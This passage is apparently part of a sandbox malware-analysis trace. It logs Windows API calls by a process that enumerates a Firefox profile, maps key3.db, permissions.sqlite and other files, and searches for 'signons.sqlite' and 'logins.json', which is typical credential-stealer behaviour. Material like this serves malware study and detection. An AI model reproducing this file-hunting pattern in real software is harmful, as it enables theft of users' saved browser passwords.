"c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.890] CloseHandle (hObject=0x4e0) returned 1 [0589.890] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0589.890] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f06a0 [0589.890] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x5f06a0, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0589.890] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.890] CloseHandle (hObject=0x4e0) returned 1 [0589.890] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0589.890] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0589.890] CreateFileMappingW (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x670 [0589.890] MapViewOfFile (hFileMappingObject=0x670, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.900] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.912] CloseHandle (hObject=0x670) returned 1 [0589.912] CloseHandle (hObject=0x4e0) returned 1 [0589.912] LocalFree (hMem=0x5f06a0) returned 0x0 [0589.912] LocalFree (hMem=0x5f0508) returned 0x0 [0589.912] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d3ac | out: lpFindFileData=0x52d3ac) returned 0 [0589.912] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0589.912] LocalFree (hMem=0x5f0230) returned 0x0 [0589.913] LocalFree (hMem=0x5a2ae8) returned 0x0 [0589.913] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0 [0589.913] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.913] LocalFree (hMem=0x578c30) returned 0x0 [0589.913] LocalFree (hMem=0x5e1e48) returned 0x0 [0589.913] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0589.913] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.913] LocalFree (hMem=0x56afc8) returned 0x0 [0589.913] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.913] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.913] lstrlenW (lpString="\\") returned 1 [0589.913] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.913] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.913] lstrlenW (lpString="key3.db") returned 7 [0589.913] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.913] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5e1d10 [0589.913] LocalFree (hMem=0x578c30) returned 0x0 [0589.913] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.913] CloseHandle (hObject=0x660) returned 1 [0589.913] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0589.913] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x578c30 [0589.913] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x578c30, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0589.913] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.913] CloseHandle (hObject=0x660) returned 1 [0589.913] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.913] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0589.913] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.913] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.914] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.914] CloseHandle (hObject=0x668) returned 1 [0589.914] CloseHandle (hObject=0x660) returned 1 [0589.914] LocalFree (hMem=0x578c30) returned 0x0 [0589.914] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.914] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.914] lstrlenW (lpString="\\") returned 1 [0589.914] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.914] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.914] lstrlenW (lpString="localstore.rdf") returned 14 [0589.914] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.914] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.914] LocalFree (hMem=0x578c30) returned 0x0 [0589.914] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.914] CloseHandle (hObject=0x660) returned 1 [0589.914] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.914] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.914] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0589.914] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.914] CloseHandle (hObject=0x660) returned 1 [0589.914] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.914] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0589.914] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.915] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.915] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.915] CloseHandle (hObject=0x668) returned 1 [0589.915] CloseHandle (hObject=0x660) returned 1 [0589.915] LocalFree (hMem=0x56c300) returned 0x0 [0589.915] LocalFree (hMem=0x56afc8) returned 0x0 [0589.915] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.915] lstrlenW (lpString="\\") returned 1 [0589.915] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.915] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.915] lstrlenW (lpString="marionette.log") returned 14 [0589.915] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.915] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.915] LocalFree (hMem=0x578c30) returned 0x0 [0589.915] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.915] CloseHandle (hObject=0x660) returned 1 [0589.915] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.915] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.915] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0589.915] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.915] CloseHandle (hObject=0x660) returned 1 [0589.915] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.916] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0589.916] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.916] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.916] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.916] CloseHandle (hObject=0x668) returned 1 [0589.916] CloseHandle (hObject=0x660) returned 1 [0589.916] LocalFree (hMem=0x56c300) returned 0x0 [0589.916] LocalFree (hMem=0x56afc8) returned 0x0 [0589.916] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.916] lstrlenW (lpString="\\") returned 1 [0589.916] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.916] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.916] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0589.916] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.916] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.916] LocalFree (hMem=0x578c30) returned 0x0 [0589.916] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.916] CloseHandle (hObject=0x660) returned 1 [0589.916] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.916] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.916] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0589.916] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.917] CloseHandle (hObject=0x660) returned 1 [0589.917] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.917] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0589.917] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.917] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.917] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.917] CloseHandle (hObject=0x668) returned 1 [0589.917] CloseHandle (hObject=0x660) returned 1 [0589.917] LocalFree (hMem=0x56c300) returned 0x0 [0589.917] LocalFree (hMem=0x56afc8) returned 0x0 [0589.917] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.917] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0589.917] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0589.917] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.917] lstrlenW (lpString="\\") returned 1 [0589.917] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.917] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.917] lstrlenW (lpString="minidumps") returned 9 [0589.917] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.917] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0589.917] LocalFree (hMem=0x578c30) returned 0x0 [0589.917] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.917] lstrlenW (lpString="\\*.*") returned 4 [0589.917] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.917] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.917] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0589.918] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.918] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.918] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.918] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.918] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0589.918] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.918] LocalFree (hMem=0x56afc8) returned 0x0 [0589.918] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.918] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.918] lstrlenW (lpString="\\") returned 1 [0589.918] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.918] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.918] lstrlenW (lpString="parent.lock") returned 11 [0589.918] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.918] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0589.918] LocalFree (hMem=0x578c30) returned 0x0 [0589.918] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.918] CloseHandle (hObject=0x660) returned 1 [0589.918] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.918] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.918] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0589.918] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.918] CloseHandle (hObject=0x660) returned 1 [0589.918] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.918] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.918] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.918] CloseHandle (hObject=0x660) returned 1 [0589.918] LocalFree (hMem=0x578c30) returned 0x0 [0589.918] StrStrIW (lpFirst="parent.lock", lpSrch="signons.sqlite") returned 0x0 [0589.918] StrStrIW (lpFirst="parent.lock", lpSrch="logins.json") returned 0x0 [0589.918] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.918] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.918] lstrlenW (lpString="\\") returned 1 [0589.918] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.918] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.918] lstrlenW (lpString="permissions.sqlite") returned 18 [0589.919] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.919] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.919] LocalFree (hMem=0x578c30) returned 0x0 [0589.919] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.919] CloseHandle (hObject=0x660) returned 1 [0589.919] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.919] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.919] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0589.919] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.919] CloseHandle (hObject=0x660) returned 1 [0589.919] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.919] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.919] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.919] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.919] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 